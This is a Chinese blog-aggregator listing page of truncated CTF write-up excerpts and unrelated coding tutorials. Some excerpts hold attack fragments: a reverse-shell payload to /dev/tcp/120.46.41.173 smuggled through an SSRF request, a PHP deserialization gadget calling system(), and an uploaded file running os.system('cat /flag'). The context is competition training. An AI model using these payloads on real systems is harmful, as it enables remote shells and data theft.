ctf 第88页

一篇文章彻底清楚shellcode(精品)

shellcode知识汇总文章目录shellcode知识汇总1.没开沙箱（此时我们可以系统调用getshell）(一)32位程序系统调用picoctf_2018_shellcode(二)64位程序系统调用

Leee333·2023-10-24 07:53

InjectFix——C#热修复方案分析 & 使用流程

InjectFix——C#热修复方案分析&使用流程一、简介InjectFix是一个基于Unity的C#代码热修复的实现方案（支持IL2CPP）。和XLua热更方案是同一位作者。

木瓜番茄锅·2023-10-24 07:19

只有正规才有机会，CTF/AWD竞赛标准参考书来了

目录前言一、内容简介二、读者对象三、目录前言随着网络安全问题日益凸显，国家对网络安全人才的需求持续增长，其中，网络安全竞赛在国家以及企业的人才培养和选拔中扮演着至关重要的角色。在数字化时代，企业为了应对日益增长的攻击威胁，一般都在大量部署安全产品、安全设备，忙于查看各种安全设备、安全运营中心（SOC）、安全态势感知平台中的告警数据，期望在早期阶段就捕获到攻击者行为并实现以下4个目标：一是最大限度减

学习python两年半·2023-10-24 06:43

ORM 1+n问题

mybatis配置UserMapper.xmlDeptMapper.xmlselectfromdeptwhereid=#{id,j

a5d93d03e01c·2023-10-24 06:36

[wp]NewStarCTF 2023 WEEK4|WEB

WEEK4|WEB逃源码：key = $key; } public function __destruct() { system($this->cmd); }}unserialize(waf(serialize(new GetFlag($_GET['key'])))); www-datawww-data经典的反序列化漏洞字符逃逸增多问题bad替换为good字符

文大。·2023-10-24 06:22

NewStarCTF2023week4-逃（反序列化字符串逃逸）

打开链接，大致审一下php代码，是反序列化相关的；结合题目提示，很典型的字符串逃逸；并且属于替换修改后导致序列化字符串变长的类型；看似加了一个waf函数对我们提交的内容进行了过滤替换，实则替换函数正是我们利用的点！从页面回显可以看出system函数被调用了，并且执行了whoami命令，执行结果为：www-datawww-data我们这里要给key传参，利用str_replace()函数，实现字符串

Myon⁶·2023-10-24 06:18

CTF- 流量分析

题目背景某公司内网网络被黑客渗透，简单了解，黑客首先攻击了一台web服务器，破解了后台的账户密码，随之利用破解的账号密码登陆了mail系统，然后获取了的申请方式，然后登陆了，在内网pwn掉了一台打印机，请根据提供的流量包回答下面有关问题。关卡列表1某公司内网网络被黑客渗透，请分析流量，给出黑客使用的扫描器2某公司内网网络被黑客渗透，请分析流量，得到黑客扫描到的登陆后台是(相对路径即可)3某公司内网

不会就跑路的小白·2023-10-24 05:47

流量分析—ctf

题目介绍该题为流量分析，当黑客入侵我们的网络是，我们可以需要通过一系列分析操作来进行抓捕与追踪，本题目难度中等偏下，不是很有难度，但题目类型较为全面，适合入手当做练习。一、题目背景某公司内网网络被黑客渗透，简单了解，黑客首先攻击了一台web服务器，破解了后台的账户密码，随之利用破解的账号密码登陆了mail系统，然后获取了的申请方式，然后登陆了，在内网pwn掉了一台打印机，请根据提供的流量包回答下面

红二岁·2023-10-24 05:37

2019-03-13

当数据库执行selectforupdate时会获取被sel

key_42e7·2023-10-24 05:41

vue重修之自定义项目、ESLint和代码规范修复

Pleasepickapreset:Default([Vue3]babel,eslint)Default([Vue2]babel,eslint)>Manuallyselectfeature

缘友一世·2023-10-23 23:34

CTF/AWD竞赛标准参考书+实战指南：《AWD特训营》

作者简介：懒大王敲代码，正在学习嵌入式方向有关课程stm32，网络编程，数据结构C/C++等欢迎大家点赞收藏⭐加关注哦！《AWD特训营》前言内容简介读者对象本书目录前言随着网络安全问题日益凸显，国家对网络安全人才的需求持续增长，其中，网络安全竞赛在国家以及企业的人才培养和选拔中扮演着至关重要的角色。在数字化时代，企业为了应对日益增长的攻击威胁，一般都在大量部署安全产品、安全设备，忙于查看各种安全设

懒大王敲代码·2023-10-23 23:03

idea：Git拉取代码

1.打开一个项目后，点击File->点击New->ProjectfromVersionControl->Git2.把Git地址放到url里，选择要放入的目录

张彡543·2023-10-23 22:27

idea结合git教程（拉取项目，提交代码，合代码等等）

文章目录拉取git项目提交（commit）拉取（pull）推送（push）代码commitpull或push合代码不同分支合代码对单独一个文件进行代码合并操作拉取git项目File->New->ProjectfromVersionControl

Java the world·2023-10-23 22:56

在IntelliJ IDEA中利用Git拉取项目

1访问gitee或github，找到项目对应的仓库，并复制仓库地址2打开IDEA，依次选择菜单:File->New->ProjectfromVersionControl3在弹出框中输入仓库路径

mymk01·2023-10-23 22:51

《亲爱的热爱的》CP里，除了童颜夫妇，我更喜欢小米和亚亚

毕竟年龄相差那么大，毕竟生活圈子太不一样，毕竟一个除了游戏（不，是CTF）什么都不懂，而另一个的前半生也只有学习这一件事情而已。对我来说，让我心疼的是孙亚亚和米邵飞。

Ms想想·2023-10-23 20:32

NSSCTF 2nd WEB

php签到考点文件上传，绕过题目&/dev/tcp/120.46.41.173/90230>&1'"""#注意后面一定要有回车，回车结尾表示http请求结束。tmp=urllib.parse.quote(payload)new=tmp.replace('%0A','%0D%0A')result='mybox://127.0.0.1:80/'+'_'+newresult=urllib.parse.q

ytl_storm·2023-10-23 20:09

NSSCTF第8页(1)

代码审计，找关键语句，发现event.js里边东西是最多的找到了通关语句他下边应该是就关键代码了，有一串16进制代码解出来是base64，接着解两次base64解码，就得到了flag,把前缀换成NSSCTF

呕...·2023-10-23 20:38

nssctf 2nd crypto

nssctf2ndsummary:利用pinvqinv分解n;利用多组e,c,恢复n差一题，格真不会啊….盯着看一天，痛苦啊EzRSA题目fromCrypto.Util.numberimport*fromsecretimportflagm

miao-25·2023-10-23 20:32

无参数RCE总结

文章目录知识点概念常见绕过姿势1、getallheaders()2、get_defined_vars()3、session_id()配合使用的函数CTF例题[GXYCTF2019]禁止套娃姿势一：array_reverse

L1am0ur·2023-10-23 20:29

centOS启动mongoDB错误：./mongod: error while loading shared libraries: libcrypto.so.10: cannot open share

/mongod:errorwhileloadingsharedlibraries:libcrypto.so.10:cannotopensharedobjectfile:Nosuchfileordirectory

晓风残月一望关河萧索·2023-10-23 20:29

NSSCTF第8页（2）

[LitCTF2023]就当无事发生没有环境[MoeCTF2022]ezhtml在js代码找到了flag[HNCTF2022WEEK2]ez_ssrf题目描述说让我们访问index.php,看到了代码传入的

呕...·2023-10-23 20:55

C++逆向学习反汇编：string

CTF比赛中C++的题越来越多，题目中经常出现string，vector等，而实际上手时发现常常迷失在"库函数"中，比如跟进了空间配置器相关函数最近研究一下关于这些的底层机制与逆向，应该会写成一个系列string

Python编程导师·2023-10-23 19:20

php bapss弱类型,PHP代码安全杂谈！

当然一般这种情况实战中用到的不是很多，但是在CTF竞赛中却是一个值得去考察的一个知识点，特此记录总结之。一、精度绕过缺陷理论在用PHP进行浮点数的运算中,经常会

weixin_39686230·2023-10-23 18:44

php代码安全吗,PHP代码安全杂谈

当然一般这种情况实战中用到的不是很多，但是在CTF竞赛中却是一个值得去考察的一个知识点，特此记录总结之。一、精度绕过缺陷理论在用PHP进行浮点数的运算中,经常会出现一

南洋野人·2023-10-23 18:13

[网络安全提高篇] 一二一.恶意软件动态分析Cape沙箱Report报告的API序列批量提取详解

“网络安全提高班”新的100篇文章即将开启，包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结，它将更加聚焦，更加深入，也是作者的慢慢成长史。

Eastmount·2023-10-23 18:28

04-高原-第一次作业#科研论文写作训练营#

Answer:1.Thegenerallogic:what-how-why,andHowtosharemyresearchandfindings.Tobespecific,Iamgonnareflectfromthefollowingfourparts

阿满Eli·2023-10-23 14:47

spark rdd算子的简单练习

统计发布招聘岗位最多的五个地区objectfrist_test{defmain(args:Array[String]):Unit={valsparkConf=newSparkConf().setMaster

南辰x·2023-10-23 14:15

MyBatis：用到的设计模式。

SqlSessionFactory、ObjectFactory、MapperProxyFactory建造者模式（Builder）对象构建和表示分离SqlSessionFactoryBuilder、XMLConfigBuilder

知其然亦知其所以然·2023-10-23 14:09

React日历组件fullcalendar使用指北

其他示例1.安装依赖npminstall--save\@fullcalendar/core\@fullcalendar/react\@fullcalendar/daygrid2.引入页面importReactfrom'react'importFullCalendarfrom

只喜欢赚钱的棉花没有糖·2023-10-23 12:11

react项目改造添加fullCalendar

npminstall--save\@fullcalendar/core\@fullcalendar/react\@fullcalendar/daygrid然后新建一个jsx文件，代码内容如下:importReactfrom'react'importFullCalendarfrom

weixin_57405849·2023-10-23 12:41

React FullCalendar 默认显示当前日期

ReactFullCalendar默认显示当前日期FullCalendar组件默认显示日期会提前一个月，所以需要手动设置初始化日期，即设置该组件的属性initialDta,如下：initialDate=

谁用了喜乐·2023-10-23 12:40

如何做CTF中MISC的图片隐写，CTF图片隐写入门

最近参加了几场CTF比赛，有网鼎杯，也有行业内部的信息杯比赛，题目有难有易，但大体思路都异曲同工。

Scalzdp·2023-10-23 11:07

如何做CTF的二维码处理，CTF二维码解题

即使是街边小摊位也能轻松扫码支付，真的不要太方便了，既然二维码如此厉害，我们就需要深入去了解一下它，并且二维码也是CTF中的一个重要的考点。

Scalzdp·2023-10-23 11:07

如何破解压缩包密码，CTF压缩包处理

压缩包处理在CTF比赛中是非常重要的一块，因为压缩包中可能包含重要信息：许多CTF题目会将关键信息隐藏在压缩包中，参赛者需要解压并查看其中的内容才能获取有用的线索。

Scalzdp·2023-10-23 11:04

react 路由render属性

作用:能够更方便地给组件传递额外的属性{return因为渲染的组件不是路由组件,所以需要传入props代码示例:importReactfrom'react';import'.

神奇大叔·2023-10-23 10:01

edge浏览器导入BurpSuite CA证书（第一篇博客）

从电脑只是用来打游戏到两个月前开始学c语言，到现在...仍是个菜鸟所以我为什么要发这篇博客呢缘由在到了学校之后在一股神秘力量的驱使下，接触到了CTF相关的知识。虽然我可能比较愚钝，但这方面我是真喜欢。

乔泽绘音·2023-10-23 09:39

【USMA】N1CTF2022-praymoon

前言本题主要利用USMA解题，当然还有其他做法，暂时不表程序分析启动脚本就不看了，该开的保护都开了。看下文件系统初始化脚本：#!/bin/shmkdir/tmpmount-tprocnone/procmount-tsysfsnone/sysmount-tdevtmpfsdevtmpfs/devmount-ttmpfsnone/tmpmdev-secho-e"Boottook$(cut-d''-f1

XiaozaYa·2023-10-23 08:37

buu刷题 GWCTF re3 wp

先拖进ida里f5找到主函数：可以看到sub_402219是一堆数据，这里是SMC自修改代码（异或0x99），去混淆：写一个idc脚本，将数据还原：#includestaticmain(){autoaddr=0x402219;autoi;for(i=0;i<=223;++i){PatchByte(addr+i,Byte(addr+i)^0x99);}}然后强制分析数据成代码（选择Force），全部

43v3rY0unG·2023-10-23 06:00

【BUUCTF】MISC(第一页wp)

文章目录签到金三胖二维码你竟然赶我走大白N种方法解决乌镇峰会种图基础破解wireshark文件中的秘密图片exifLSBLSB隐写（最低有效位隐写）：zip伪加密ZIP文件由**三个部分**组成：**压缩源文件数据区**：**压缩源文件目录区**：**压缩源文件目录结束标志**：rar被嗅探的流量qr镜子里面的世界ningen小明的保险箱爱因斯坦easycap隐藏的钥匙另外一个世界FLAG神秘龙卷

Leekos·2023-10-23 06:00

buu逆向[ACTF新生赛2020]Oruga wp

首先拿到题目，f5大法，找到主函数14-22行就是在做一件事：让前五位为actf{24行发现关键函数：sub_78A()，点进去看看：看到函数整体结构，两个while循环嵌套，中间四个分支语句，盲猜迷宫

43v3rY0unG·2023-10-23 06:30

BUUCTF misc第二页WP

目录梅花香之苦寒来just_a_rar鸡你太美神奇的二维码一叶障目穿越时空的思念纳尼outguess我有一只马里奥谁赢了比赛？来题中等的吧gakkifind_mebase64隐写伟大的侦探KO黑客帝国你能看懂音符吗ezmiscsqltest你有没有好好看网课？梅花香之苦寒来拿到图片后binwalk啥也没有，拖进010看16进制文件结构很完整，但是FFD9后面跟着一大串数字字母，而且貌似还有一定规律

MUNG东隅·2023-10-23 06:30

buu web部分wp

[GYCTF2020]NodeGame打开后给了源码和一个文件上传的页面，查看源码猜测这里可以利用这里的action参数是我们可控的，结合文件上传界面，猜测是要想办法实现目录穿越，传文件到/template

Lyyhun·2023-10-23 06:30

(wp)ctfweb-buu中ssti模板注入

（wp）ctfweb-buu中ssti模板注入我的blog，欢迎来玩前面写过学习文章一、[护网杯2018]easy_tornado打开题目，只有三个链接，如图，依次点开[外链图片转存失败,源站可能有防盗链机制

番茄炒饭加个蛋·2023-10-23 06:29

buuctf[极客大挑战 2019]Havefun 1

网页环境title标题每一帧都不要放过，或许那个不起眼的地方就存在重要信息到这并未发现什么重要信息，F12看看在源代码底部发现PHP代码：PHP代码审计通过GET方式进行传参（就是通过URL地址进行传参)，这个参数是cat输出参数cat的值if判断语句，当cat=dog的时候即可输出flag构造payload：url/?cat=dog爆出flag：

白猫a٩·2023-10-23 06:29

2023i春秋香山杯网络安全大赛Write up

_2_Fwi}发现不是flag，根据以往做题经验，猜测是二次加密，再看这个格式像是凯撒移位根据凯撒移位规则，得出移位数为3，故key是3进行凯撒移位密码解密爆出flag：flag{we1c0m3_2_ctf

白猫a٩·2023-10-23 06:59

buu re部分wp (六)（未完待续）

[BJDCTF2020]hamburgercompetition相册[BJDCTF2020]hamburgercompetition哈哈哈哈出题人是个人才Unity的游戏，先找_Assembly-CSharp.dll

*^ˇ^*·2023-10-23 06:58

应用于Firefox浏览器关于burpsuite的代理问题-详解

在最近打ctf网安比赛的时候发现burp不能用了。

白猫a٩·2023-10-23 06:58

AGCTF 2023陇剑杯wp

SSWSmallSword_1导出HTTP对象的时候发现有sql注入的语句，猜测攻击手法是sql注入在这里发现了可疑的php文件追踪15340发现可控参数，也就是连接密码Flag：flag{0898e404bfabd0ebb702327b19f}SmallSword_2知道攻击手法，因为蚁剑连接的方式是POST所以直接用语法搜索http.request.method==“POST”在24393组发

f0njl·2023-10-23 06:28

Bugku CTF web 你必须让他停下来解题思路

启动场景发现网页一直在刷新，按F12查看源代码可以在某一次网页刷新时看到flag但是复制不了这时你可以禁用浏览器JavaScript页面特效，再次启动场景并进行手动刷新，按F12，在某一次刷新时就可以拿到flag！

白猫a٩·2023-10-23 06:28

Bugku CTF Flask_FileUpload 解题思路

启动场景发现需要上传图片格式为jpg或png其次注释显示上传文件以python作为返回结果由此我们还需要在jpg或png文件中做文章需要了解system函数os.system是os模块最基础的，在该基础上用其他方法进行封装在jpg或png文件中输入以下代码importosos.system('cat/flag')保存后进行上传，最后按F12就可以拿到flag